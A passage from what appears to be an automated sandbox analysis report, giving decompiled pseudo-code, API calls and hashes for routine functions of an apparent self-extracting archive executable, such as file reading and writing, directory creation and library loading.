Part of subcall function 01010085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100EB86,Crypt32.dll,00000000,0100EC0A,?,?,0100EBEC,?,?,?), ref: 010100C2

OleInitialize.OLE32(00000000), ref: 0101A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101A385
SHGetMalloc.SHELL32(01048430), ref: 0101A38F

Strings

riched20.dll, xrefs: 0101A33D

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: f41bf503124720264a587d46a3801c3bb645fd237ef83ebdb08553bd743e21c5
Instruction ID: 0fd7b4472f3060053c46d49c0d18f5e075e0fcfd57bb4f38849a9f3c407c71db
Opcode Fuzzy Hash: f41bf503124720264a587d46a3801c3bb645fd237ef83ebdb08553bd743e21c5
Instruction Fuzzy Hash: EAF0F4B1D00109ABDB10AF95D8449EFFBFCEF95701F00415AF894E2204DBB955458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0101D287, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0101D287(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E0101E360();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E0100FBD8(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E0100FCF1() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}

0x0101d287
0x0101d28f
0x0101d29d
0x0101d2b2
0x0101d2b7
0x0101d2bb
0x0101d2c0
0x0101d2ca
0x0101d2c3
0x0101d2c3
0x0101d2c9
0x0101d2c9
0x0101d2d9
0x0101d2d9
0x0101d2e3

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0101D29D
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101D2D9

Strings

sfxpar, xrefs: 0101D2D4
sfxcmd, xrefs: 0101D298

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 6bf9ff4765cfc82ac129e9ed265f259ec819fcdf9686f9a7d17f735ddab3447f
Instruction ID: 2803c62d47c1a6c11b70bdb37d8a849eb8b96e7b254a8c33fa792cc8a4e1c907
Opcode Fuzzy Hash: 6bf9ff4765cfc82ac129e9ed265f259ec819fcdf9686f9a7d17f735ddab3447f
Instruction Fuzzy Hash: 16F08272810229A6E7312FD59C09EEEBBADAF29651B000455FDC45A144D669CD409BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0100984E, Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0100984E(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E01009989(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E0100984E(_t25);
						}
					}
				}
				return _t15;
			}

0x01009851
0x01009853
0x0100985a
0x01009864
0x01009864
0x01009876
0x0100987e
0x010098da
0x01009880
0x01009882
0x01009889
0x010098a2
0x010098a6
0x010098b7
0x010098bb
0x010098d5
0x010098d5
0x010098c7
0x010098c7
0x010098d0
0x00000000
0x010098d2
0x010098d2
0x00000000
0x010098d2
0x010098d0
0x010098a8
0x010098a8
0x010098b1
0x00000000
0x010098b3
0x010098b3
0x010098b3
0x010098b1
0x0100988b
0x0100988b
0x01009893
0x00000000
0x01009895
0x01009895
0x01009896
0x01009896
0x0100989b
0x0100989b
0x01009893
0x01009889
0x010098e2

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0100985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 01009876
GetLastError.KERNEL32 ref: 010098A8
GetLastError.KERNEL32 ref: 010098C7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: c1765be80808f8e70403b21f000d8e56a320483424b33247723283876123da45
Instruction ID: 15906a87f83edd8813f4986bfbccd496fd77e4417c8f2f6a290a8d6a86cde746
Opcode Fuzzy Hash: c1765be80808f8e70403b21f000d8e56a320483424b33247723283876123da45
Instruction Fuzzy Hash: C2117030900204EBFB634A59C944A7977ECFB45639F00856AF5EE857C2D7399B408F52

Uniqueness

Uniqueness Score: -1.00%

Function 0102A4F4, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E0102A4F4(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x10615e0 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x1036e90 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x7ecdc17f
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x0102a4f9
0x0102a4fd
0x0102a504
0x0102a508
0x0102a516
0x0102a526
0x0102a52c
0x0102a530
0x0102a559
0x0102a55b
0x0102a55f
0x0102a562
0x0102a562
0x0102a568
0x0102a56a
0x00000000
0x0102a56b
0x0102a532
0x0102a53b
0x0102a54a
0x0102a53d
0x0102a540
0x0102a546
0x0102a546
0x0102a54e
0x00000000
0x0102a550
0x0102a553
0x0102a555
0x00000000
0x0102a555
0x0102a54e
0x0102a50a
0x0102a50f
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0100CFE0,00000000,00000000,?,0102A49B,0100CFE0,00000000,00000000,00000000,?,0102A698,00000006,FlsSetValue), ref: 0102A526
GetLastError.KERNEL32(?,0102A49B,0100CFE0,00000000,00000000,00000000,?,0102A698,00000006,FlsSetValue,01037348,01037350,00000000,00000364,?,01029077), ref: 0102A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0102A49B,0100CFE0,00000000,00000000,00000000,?,0102A698,00000006,FlsSetValue,01037348,01037350,00000000), ref: 0102A540

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 363022fbbc1b15a651f4074e80c262be47b646fb04ee42c7a37fb392efa7c8bc
Instruction ID: 0612ad9a7e38eb55e249c3ba56fb8c0523cd91998cf26fe71ead03deb19adbfc
Opcode Fuzzy Hash: 363022fbbc1b15a651f4074e80c262be47b646fb04ee42c7a37fb392efa7c8bc
Instruction Fuzzy Hash: 3201F732711232EBC731896C9C84A57BB9CBF45BA17540520F986D7540DF3AD500CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01009F2F, Relevance: 4.6, APIs: 3, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E01009F2F(void* __edx, void* _a4, long _a8) {
				char _v4;
				long _v8;
				void* __ecx;
				void* __ebp;
				int _t28;
				intOrPtr _t31;
				long _t36;
				int _t39;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t58;
				intOrPtr _t62;
				void* _t66;
				long _t68;

				_t58 = __edx;
				_t68 = _a8;
				_t49 = _t50;
				if(_t68 != 0) {
					if( *((intOrPtr*)(_t49 + 0xc)) == 1) {
						 *(_t49 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						do {
							_v8 = _v8 & 0x00000000;
							_v4 = 0;
							if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
								_t28 = WriteFile( *(_t49 + 4), _a4, _t68,  &_v8, 0); // executed
								asm("sbb al, al");
								_t31 =  ~(_t28 - 1) + 1;
								_v4 = _t31;
								L14:
								if(_t31 != 0) {
									L22:
									 *((char*)(_t49 + 8)) = 1;
									return _v4;
								}
								L15:
								if( *((char*)(_t49 + 0x1a)) == 0 ||  *((intOrPtr*)(_t49 + 0xc)) != 0) {
									goto L22;
								} else {
									_t65 = _t49 + 0x24;
									if(E01006E18(0x1040f50, _t49 + 0x24, 0) == 0) {
										E01007061(0x1040f50, _t68, 0, _t65);
										goto L22;
									}
									goto L18;
								}
							}
							_t66 = 0;
							if(_t68 == 0) {
								goto L15;
							} else {
								goto L8;
							}
							while(1) {
								L8:
								_t36 = _t68 - _t66;
								if(_t36 >= 0x4000) {
									_t36 = 0x4000;
								}
								_t39 = WriteFile( *(_t49 + 4), _a4 + _t66, _t36,  &_v8, 0);
								asm("sbb al, al");
								_t31 =  ~(_t39 - 1) + 1;
								_v4 = _t31;
								if(_t31 == 0) {
									goto L15;
								}
								_t66 = _t66 + 0x4000;
								if(_t66 < _t68) {
									continue;
								}
								goto L14;
							}
							goto L15;
							L18:
						} while (_v8 >= _t68 || _v8 <= 0);
						_t62 =  *_t49;
						 *0x1033260(0);
						_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14))))();
						asm("sbb edx, 0x0");
						 *0x1033260(_t43 - _v8, _t58);
						 *((intOrPtr*)(_t62 + 0x10))();
					}
				}
				return 1;
			}

0x01009f2f
0x01009f33
0x01009f37
0x01009f3b
0x01009f48
0x01009f52
0x01009f52
0x01009f57
0x01009f5c
0x01009f5c
0x01009f65
0x01009f6a
0x01009fb8
0x01009fc1
0x01009fc3
0x01009fc5
0x01009fc9
0x01009fcb
0x0100a03e
0x0100a043
0x00000000
0x0100a047
0x01009fcd
0x01009fd1
0x00000000
0x01009fd9
0x01009fdb
0x01009feb
0x0100a039
0x00000000
0x0100a039
0x00000000
0x01009feb
0x01009fd1
0x01009f6c
0x01009f70
0x00000000
0x00000000
0x00000000
0x00000000
0x01009f72
0x01009f72
0x01009f74
0x01009f78
0x01009f7a
0x01009f7a
0x01009f8e
0x01009f97
0x01009f99
0x01009f9b
0x01009f9f
0x00000000
0x00000000
0x01009fa1
0x01009fa5
0x00000000
0x00000000
0x00000000
0x01009fa7
0x00000000
0x01009fed
0x01009fed
0x0100a002
0x0100a00b
0x0100a013
0x0100a01c
0x0100a021
0x0100a029
0x0100a029
0x01009f57
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0100CC94,00000001,?,?,?,00000000,01014ECD,?,?,?), ref: 01009F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,01014ECD,?,?,?,?,?,01014972,?), ref: 01009F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0100CC94,00000001,?,?), ref: 01009FB8

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 73576233b31b026dc4571a74d4094de4b1eda16fb70c5cb7cbf5b1d6ed811c89
Instruction ID: 900649f174bde9435a62d986898f2b8650ccf7c50f6ac131ed68e2bdc5c010ec
Opcode Fuzzy Hash: 73576233b31b026dc4571a74d4094de4b1eda16fb70c5cb7cbf5b1d6ed811c89
Instruction Fuzzy Hash: 6D31C4712083059BEF268F18D9487BABBE8EB40714F04465DFAC99B1C6C775D948CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0100A207, Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100A207(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E0101E360();
				_t21 = _a4;
				_t8 =  *(E0100BC69(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E0100A180(_t21) != 0 || E0100B66C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E0100A444(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}

0x0100a20f
0x0100a215
0x0100a21e
0x0100a224
0x0100a238
0x0100a240
0x0100a27e
0x0100a284
0x0100a287
0x0100a293
0x0100a295
0x0100a289
0x0100a289
0x0100a28c
0x00000000
0x0100a28e
0x0100a290
0x0100a290
0x0100a28c
0x00000000
0x00000000
0x00000000
0x0100a22b
0x0100a22e
0x0100a236
0x0100a26b
0x0100a26f
0x0100a275
0x0100a275
0x0100a27a
0x00000000
0x00000000
0x00000000
0x0100a236
0x0100a29a

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0100A113,?,00000001,00000000,?,?), ref: 0100A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0100A113,?,00000001,00000000,?,?), ref: 0100A261
GetLastError.KERNEL32(?,?,?,?,0100A113,?,00000001,00000000,?,?), ref: 0100A27E

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 63e61ff4a12b10d580b7a168a0ca20ee3204f34fb82e54176e0be6a9174a9038
Instruction ID: c295d4251dc30a8dba8f63049857b298252a175b226352376baf04a06b4d4c9c
Opcode Fuzzy Hash: 63e61ff4a12b10d580b7a168a0ca20ee3204f34fb82e54176e0be6a9174a9038
Instruction Fuzzy Hash: 1E019235744329E6FF739A6C4C45BEE779CAF1A681F0444A1FAC1DB0C0DA6AC64186A1

Uniqueness

Uniqueness Score: -1.00%

Function 0102AFF4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0102AFF4(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0x102b646
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0x102b646
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E0102C099(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0x7d8b57fc
					E0102A275(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0x7d8b57fc
					E0102A275(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E0101EC4A(_v8 ^ _t102);
			}

0x0102aff4
0x0102afff
0x0102b006
0x0102b00b
0x0102b016
0x0102b028
0x0102b120
0x0102b120
0x0102b126
0x0102b128
0x0102b129
0x0102b129
0x0102b12b
0x0102b131
0x0102b131
0x0102b133
0x0102b135
0x0102b13e
0x0102b141
0x0102b14d
0x0102b154
0x0102b164
0x0102b156
0x0102b156
0x0102b159
0x0102b159
0x0102b159
0x0102b15d
0x0102b15d
0x00000000
0x0102b15d
0x0102b143
0x0102b143
0x0102b148
0x0102b148
0x0102b160
0x0102b160
0x0102b160
0x0102b166
0x0102b16c
0x0102b16c
0x0102b172
0x0102b173
0x0102b173
0x0102b02e
0x0102b02e
0x0102b030
0x0102b030
0x0102b037
0x0102b038
0x0102b03c
0x0102b042
0x0102b048
0x0102b070
0x0102b070
0x0102b072
0x00000000
0x00000000
0x0102b051
0x0102b055
0x0102b067
0x0102b067
0x0102b069
0x00000000
0x00000000
0x0102b05a
0x0102b05c
0x0102b05e
0x0102b066
0x0102b066
0x00000000
0x0102b066
0x00000000
0x0102b05c
0x0102b06b
0x0102b06b
0x0102b06e
0x0102b06e
0x0102b075
0x0102b08a
0x0102b090
0x0102b0a4
0x0102b0ab
0x0102b0ba
0x0102b0cc
0x0102b0d3
0x0102b0db
0x0102b0dd
0x0102b0dd
0x0102b0e7
0x0102b0f7
0x0102b0f9
0x0102b110
0x0102b0fb
0x0102b0fb
0x0102b0fb
0x0102b0fb
0x0102b100
0x00000000
0x0102b100
0x0102b0e9
0x0102b0e9
0x0102b0ee
0x0102b107
0x0102b107
0x0102b107
0x0102b117
0x0102b118
0x0102b11c
0x0102b187

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0102B019

Strings

, xrefs: 0102B05E

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: b3947c22113e0a8c8ee4b072e7df9d3817d3545c80e4439ebd22f671597f998a
Instruction ID: 54b80581e9fce7bdd76b1477d5cc5368608fd68c5f9d1d3391941208e53cdd76
Opcode Fuzzy Hash: b3947c22113e0a8c8ee4b072e7df9d3817d3545c80e4439ebd22f671597f998a
Instruction Fuzzy Hash: 14410A7050436C9ADB228E68CC84BFABBFDEB45304F5804EDE5DA87142D239AA45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0102A72C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E0102A72C(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E0102A458(0x16, "LCMapStringEx", 0x1037374, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E0102A7B4(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x1033260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E0101EC4A(_v8 ^ _t33);
			}

0x0102a72c
0x0102a731
0x0102a732
0x0102a739
0x0102a73c
0x0102a74e
0x0102a753
0x0102a75a
0x0102a79d
0x0102a75c
0x0102a779
0x0102a77f
0x0102a77f
0x0102a7b1

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0102A79D

Strings
